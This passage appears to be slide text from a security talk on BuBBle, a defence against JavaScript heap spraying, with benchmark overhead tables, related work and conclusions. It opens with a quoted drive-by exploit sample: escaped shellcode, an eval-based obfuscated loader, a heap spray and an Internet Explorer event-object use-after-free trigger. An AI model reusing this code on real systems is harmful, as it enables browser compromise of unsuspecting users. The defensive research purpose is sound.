b33%u1453%u0153%u1b5buebc8%u8818%u8b89%u8888%u8888%u8888%u888fu5388%ud09eu2f30%ud8d8%u53d8%ue4a6%uec30%ud8d9%u30d8%ud8efud8d8%ubbb0%uafaeub0d8%ub0abub7bcu538cud49eu6e30%ud8d8%u51d8%ue49eu79bcud8dcud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89eu4230%ud8d8%uebd8%u8b03%u8b8bu278bu3008%ud83dud8d8%u3459%ud9d8%ud8d8%u2453%u1f5bu1fdcueadfu49acu1fd4%udc9fu51bbu9709%u9f1fu78d0%u4fbdu1f13%ud49fu9889%ua762%u9f1fue6c8%u6ec5%u1fe1%ucc9fub160%uc30cu9f1fu66c0%ubea7%u1f78%uc49fu7124%u75efu9f1fu40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498%ua853%u75c4%ub053%u53d0%u512fubc8eudcb2%u3081%ud87bud8d8%u3a48%ub020%ueaebud8d8%u8db0%ubdabu8caaude53%uca30%ud8d8%u53d8%ub230%u81ddu5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dcu30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0acu2753%u538du5534%udd98%u3827%ue030%ud8d8%u1bd8%ue058%u5830%u31e0%uc9adua059%u48ddu4848%uac48%ub03fud2d0%ud8d8%u9855%u27ddu3038%ud8cfud8d8%u301bud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1eu5160%ud987%u1fbeudd9fu3827%u8b1bu0453%ub28bub098%uc8d8%ud8d8%u538fuf89eu5e30%u2727%u8027%u891bu538eue4aduac53%ua0f6%u2ddbu538euf8aeu2ddbu11ebu9991%udb75%ueb1dud703%uc866%u0ee2%ud0acu1319%udbdfu9802%u2933%uc7e3%u3fadu5386%ufc86%u05dbu53beu93d4%u8653%udbc4%u5305%u53dcu1ddbu8673%u1b81%uc230%u2724%u6a27%u3a2au6a2cud7eeu28cbua390%ueae5%u49acu5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4auc6a8%ubc7cu4b37%u3ceau564cud2cbua174%u3ee1%u1c40%uc755%u8faud5beu9b27%u7466%u4003%uc8d2%u5820%u770eu2342%ucd8bub0beuacacue2a8%uf7f7%ubdbcub7b5%uf6e9%uacbeub9a8%ubbbbuabbduf6abubbbbubcf7%ub5bd%uf7b7%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280, 238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833, 728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364, 350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686, 805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693, 322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833, 224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224, 735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637, 735, 651, 427, 770, 301, 805, 693, 413, 875);var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc);
var x1 = new Array(); for (i = 0; i < 200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = "\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0du0c0du0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d"; for (i = 0; i < x1.length; i ++ ){ x1[i].data = p; } ; var t = e1.srcElement; }</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>
BuBBle: performance benchmarks
• Macrobenchmarks
• Sunspider Benchmark Suite
• V8
• PeaceKeeper bench.
• Memory overhead analysis
Test Perf.Overhead
3d 0.17%
bitops 0.89%
controlflow 1.44%
math 0.62%
regexp 0.23%
string base64 27.3%
fasta 1.24%
tagcloud 2.20%
unpack 3.24%
validate 9.30%
Average 5.19%
Benchmark Perf. Overhead
Rendering 0.5%
Social Networking 0.5%
Complex Graphics 2.2%
Data 14%
DOM ops. 0.2%
Text parsing 2.0%
Total 2.8%
Peacekeeper Javascript BenchmarksSunspider Javascript Benchmark Suite
Site URL Perf. overhead
economist.com 5.6%
amazon.com 4.7%ebay.com 4.2%
facebook.com 4.9%
maps.google.com 3.2%
docs.google.com 6.3%
cnn.com 4.8%
youtube.com 4.9%
Average 4.8%
Macrobenchmarks
Benchmark Perf. Overhead
Richards 5.6%
DeltaBlue 3.6%
Crypto 10%
Ray Trace 1.5%
Early Boyer 3.7%
RegExp 0.6%
Splay 1.8%
Total 2.6%
V8 Javascript Benchmarks
BuBBle: memory overhead
• 1/24 changes
• n-‐byte original string
• i = n/24
• support data structure 2i bytes long
• 8.3% memory overhead (theoretical and room for improvement)
BuBBle: memory overhead
• 1/24 changes
• n-‐byte original string
• i = n/24
• support data structure 2i bytes long
• 8.3% memory overhead (theoretical and room for improvement)
Benchmark Mem. Overhead
Sunspider 5.6%
V8 4.2%
Peacekeeper 6.5%
Average 5.3%Memory overhead analysis from proc file system
Related work• ASLR
Bhatkar, S., Duvarney, D.C., Sekar, R.: Address obfuscation: An efficient approach to combat a broad range of memory error exploits. Proceedings of the 12th USENIX Security Symposium, Washington, D.C., U.S.A., August 2003
• DEPData Execution Prevention: Windows Server 2003 with SP1
• Nozzle
Ratanaworabhan, P., Livshits, B., Zorn, B.: Nozzle: A defense against heap-spraying code injection attacks. Technical report, Microsoft Research (November 2008)
• Shellcode detection
Egele,M.,Wurzinger,P.,Kruegel,C.,Kirda,E.:Defending browsers against drive-by downloads: mitigating heap-spraying code injection attacks. In: Flegel, U., Bruschi, D. (eds.) Detection of Intrusions and Malware, and Vulnerability Assessment. LNCS, vol. 5587, pp. 88– 106. Springer, Heidelberg (2009)
Conclusion• Lightweight solution(e.g. Mozilla Firefox, Mozilla Fennec)
• Implemented for Javascript strings
• Allocation of malicious objects from external media
(mp3, ... )
• Future dev: protect arrays of integers, protect other engines
• Not just for browsers
?